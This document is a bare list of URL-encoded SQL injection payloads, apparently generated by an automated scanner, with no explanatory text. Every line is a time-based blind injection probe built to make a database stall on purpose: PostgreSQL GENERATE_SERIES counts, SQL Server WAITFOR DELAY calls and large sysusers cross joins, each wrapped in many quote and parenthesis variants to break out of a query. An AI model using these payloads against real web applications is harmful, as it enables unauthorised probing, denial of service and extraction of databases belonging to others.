1%29%20WHERE%204535%3D4535%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%29%20WHERE%202105%3D2105%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20WHERE%206895%3D6895%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%22%20WHERE%207520%3D7520%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29-- 1%27%20%7C%7C%20%28SELECT%204877%20FROM%20DUAL%20WHERE%207988%3D7988%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206765%20WHERE%201091%3D1091%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%201304%20FROM%20DUAL%20WHERE%203645%3D3645%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 1%20%2B%20%28SELECT%201538%20WHERE%209139%3D9139%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29 1%27%20%2B%20%28SELECT%20%27qsca%27%20FROM%20DUAL%20WHERE%207455%3D7455%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27zZTN%27%20WHERE%206647%3D6647%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202333%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29--%20%23 1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%286065%3D6065 1%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%284944%3D4944 1%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%281620%3D1620 1%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27oJAz%27%3D%27oJAz 1%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27oLGW%27%3D%27oLGW 1%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27Licm%27%3D%27Licm 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27kWdQ%27%3D%27kWdQ 1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%27GevD%27%20LIKE%20%27GevD 1%27%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%27KqeM%27%20LIKE%20%27KqeM 1%27%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%27QMAP%27%20LIKE%20%27QMAP 1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%27Owyj%27%20LIKE%20%27Owyj 1%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22MASe%22%3D%22MASe 1%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22qJKM%22%3D%22qJKM 1%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22siol%22%3D%22siol 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22MgPn%22%3D%22MgPn 1%22%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%22AxAZ%22%20LIKE%20%22AxAZ 1%22%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%22XUvn%22%20LIKE%20%22XUvn 1%22%29%29%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%28%28%28%22OsDb%22%20LIKE%20%22OsDb 1%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AND%20%22OvZS%22%20LIKE%20%22OvZS 1%29%20WHERE%204267%3D4267%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%29%20WHERE%208802%3D8802%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20WHERE%201661%3D1661%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%22%20WHERE%207686%3D7686%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20%7C%7C%20%28SELECT%204024%20FROM%20DUAL%20WHERE%205170%3D5170%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209026%20WHERE%204931%3D4931%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207234%20FROM%20DUAL%20WHERE%205925%3D5925%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 1%20%2B%20%28SELECT%207870%20WHERE%202060%3D2060%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29 1%27%20%2B%20%28SELECT%20%27wBGI%27%20FROM%20DUAL%20WHERE%203804%3D3804%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27LbNF%27%20WHERE%204031%3D4031%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20%23 1%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%22%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%288182%3D8182 1%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%284051%3D4051 1%29%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%288485%3D8485 1%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27srEg%27%3D%27srEg 1%27%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27hthO%27%3D%27hthO 1%27%29%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27cpqK%27%3D%27cpqK 1%27%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27NEGK%27%3D%27NEGK 1%27%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27fiPg%27%20LIKE%20%27fiPg 1%27%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27uVGy%27%20LIKE%20%27uVGy 1%27%29%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27MUCB%27%20LIKE%20%27MUCB 1%27%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27leai%27%20LIKE%20%27leai 1%22%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22abgH%22%3D%22abgH 1%22%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22SQEm%22%3D%22SQEm 1%22%29%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22ahah%22%3D%22ahah 1%22%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22lkzf%22%3D%22lkzf 1%22%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22Aoni%22%20LIKE%20%22Aoni 1%22%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22vpDV%22%20LIKE%20%22vpDV 1%22%29%29%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22sfQT%22%20LIKE%20%22sfQT 1%22%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22kcri%22%20LIKE%20%22kcri 1%29%20WHERE%209682%3D9682%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%29%20WHERE%205446%3D5446%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%20WHERE%206836%3D6836%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%22%20WHERE%206234%3D6234%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 1%27%20%7C%7C%20%28SELECT%206299%20FROM%20DUAL%20WHERE%206878%3D6878%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205323%20WHERE%203939%3D3939%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209266%20FROM%20DUAL%20WHERE%201294%3D1294%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 1%20%2B%20%28SELECT%201400%20WHERE%208172%3D8172%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 1%27%20%2B%20%28SELECT%20%27QFRi%27%20FROM%20DUAL%20WHERE%201499%3D1499%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ofsC%27%20WHERE%207054%3D7054%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%205342%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 1%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%289362%3D9362 1%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%286741%3D6741 1%29%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%285278%3D5278 1%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27tJgt%27%3D%27tJgt 1%27%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27xyKc%27%3D%27xyKc 1%27%29%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27Ydgg%27%3D%27Ydgg 1%27%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27OgYj%27%3D%27OgYj 1%27%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27qUMK%27%20LIKE%20%27qUMK 1%27%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27bvGj%27%20LIKE%20%27bvGj 1%27%29%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27dqNZ%27%20LIKE%20%27dqNZ 1%27%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27MLxw%27%20LIKE%20%27MLxw 1%22%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22LzJB%22%3D%22LzJB 1%22%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22iPVM%22%3D%22iPVM 1%22%29%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22KKtl%22%3D%22KKtl 1%22%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22PuLP%22%3D%22PuLP 1%22%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22gRND%22%20LIKE%20%22gRND 1%22%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22tXnA%22%20LIKE%20%22tXnA 1%22%29%29%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22ScAH%22%20LIKE%20%22ScAH 1%22%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22LSXD%22%20LIKE%20%22LSXD 1%29%20WHERE%202826%3D2826%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20WHERE%206763%3D6763%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20WHERE%208259%3D8259%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20WHERE%204713%3D4713%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20%7C%7C%20%28SELECT%204714%20FROM%20DUAL%20WHERE%207032%3D7032%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202052%20WHERE%202903%3D2903%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207046%20FROM%20DUAL%20WHERE%204543%3D4543%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 1%20%2B%20%28SELECT%202091%20WHERE%206509%3D6509%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 